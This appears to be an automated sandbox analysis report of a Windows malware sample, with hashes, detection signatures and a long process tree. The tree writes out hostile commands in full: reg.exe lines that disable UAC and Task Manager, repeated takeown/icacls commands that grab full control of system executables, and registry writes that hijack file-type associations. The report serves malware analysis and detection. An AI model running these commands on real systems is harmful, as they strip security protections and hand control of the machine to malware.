Analysis
- max time kernel: 150s
- max time network: 95s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
- submitted: 02-10-2024 23:56
Static task: static1
Behavioral task: behavioral1
- Sample: 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
- Resource: win7-20240903-en
Behavioral task: behavioral2
- Sample: 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
- Resource: win10v2004-20240802-en
General
- Target: 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
- Size: 514KB
- MD5: 65c713d83b613d647d369ed305632930
- SHA1: eb79bea11c59b78498dbf65679ba1a24203e8d9e
- SHA256: 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878f
- SHA512: 26d9af89110278380c85c8193d44ac1002e4df88dfce7312402f2bd6b6e610e92559600a71068c54a17598429f55a36cc69998cb210f6ceb964d5f53f31032b5
- SSDEEP: 6144:/pW2bgbbV28okoS1oWMkdlZQ5iinNrv26FYLIcw/3ScNAf3:/pW2IoioS6p7q
Malware Config
Signatures
-
Processes:
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Processes:
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
- 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe: Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation
Modifies file permissions 1 TTPs 64 IoCs
Processes:
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
- 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1"
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
- 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe: File opened for modification C:\Windows\System32\wowreg32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 10 IoCs
Processes:
Process 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe set the following values (str):
- \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe HTMWF %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe RTFDF %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe CMDSF %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe VBSSF %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1"
- \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1"
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
- PID 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Processes
- "C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe" (PID 4432)
  Signatures: Checks computer location settings; Modifies system executable filetype association; Drops file in System32 directory; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f (PID 1300)
    Signatures: UAC bypass; Modifies registry key
  - "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f (PID 920)
    Signatures: Modifies registry key
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\bfsvc.exe" (PID 2104)
    Signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 4192)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\HelpPane.exe" (PID 1184)
    Signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 2396)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\hh.exe" (PID 900)
    Signatures: Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 1924)
    Signatures: Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\splwow64.exe" (PID 4824)
    Signatures: Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 2272)
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\winhlp32.exe" (PID 3420)
    Signatures: Possible privilege escalation attempt; Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 1988)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\write.exe" (PID 3948)
    Signatures: Possible privilege escalation attempt; Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 5024)
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\raserver.exe" (PID 3200)
    Signatures: Possible privilege escalation attempt; Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 3564)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\msra.exe" (PID 3636)
    Signatures: Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 3104)
    Signatures: Possible privilege escalation attempt
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\quickassist.exe" (PID 3076)
    Signatures: Possible privilege escalation attempt; Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 1356)
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\sdchange.exe" (PID 1456)
    Signatures: Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 3840)
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" (PID 2840)
    Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 3388)
    Signatures: Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\logagent.exe" (PID 2452)
    Signatures: Possible privilege escalation attempt; Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 4584)
    Signatures: Possible privilege escalation attempt
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe" (PID 2612)
    Signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 1180)
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\gpscript.exe" (PID 1744)
    Signatures: Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 2652)
    Signatures: Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\mavinject.exe" (PID 4568)
    Signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 2828)
    Signatures: Possible privilege escalation attempt
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe" (PID 1828)
    Signatures: Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 1688)
    Signatures: Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe" (PID 2888)
    Signatures: Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 2848)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\runas.exe" (PID 1800)
    Signatures: Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 2268)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\mstsc.exe" (PID 4544)
    Signatures: Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 3140)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe" (PID 4552)
    Signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 2296)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 2932)
    Signatures: Suspicious use of AdjustPrivilegeToken
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 4104)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 436)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 548)
    Signatures: Possible privilege escalation attempt
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 3828)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 976)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 3008)
    Signatures: Modifies file permissions
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 4508)
    Signatures: Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 4652)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 2312)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 4660)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 1188)
    Signatures: Possible privilege escalation attempt; Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 4720)
    Signatures: Possible privilege escalation attempt
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 4616)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 2800)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 968)
    Signatures: Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 4164)
    Signatures: Modifies file permissions
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 2996)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 2220)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 2404)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 3384)
    Signatures: Possible privilege escalation attempt
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 3448)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 2540)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 832)
    Signatures: Possible privilege escalation attempt
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 672)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 4620)
    Signatures: Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 2836)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 5100)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 3256)
    Signatures: Modifies file permissions
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 4908)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 3580)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 4560)
    Signatures: Possible privilege escalation attempt
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 2020)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 4588)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 4764)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 3088)
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 1572)
  - "C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F) (PID 3408)
    Signatures: Modifies file permissions
  - "C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe" (PID 552)
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3740
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:3024
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1312
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1360
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5040
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2044
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4768
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3128
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1856
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3320
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2576
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:1376
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1432
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4772
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:884
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3120
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1452
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:2528
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4068
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:872
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3064
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:1408
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3960
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3832
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4224
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3844
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4836
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:3668
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4604
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:4808
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4796
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:32
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3548
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:3444
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3864
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4620
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:2988
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5096 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2404
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:1996
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4892
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2800
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Modifies file permissions
PID:5020
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2172 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4164
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1528
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2420
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵
- Possible privilege escalation attempt
PID:1476
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4452 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2540
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3108
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4652
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3944 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3008
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"2⤵PID:3472
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3828
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4064
-
-
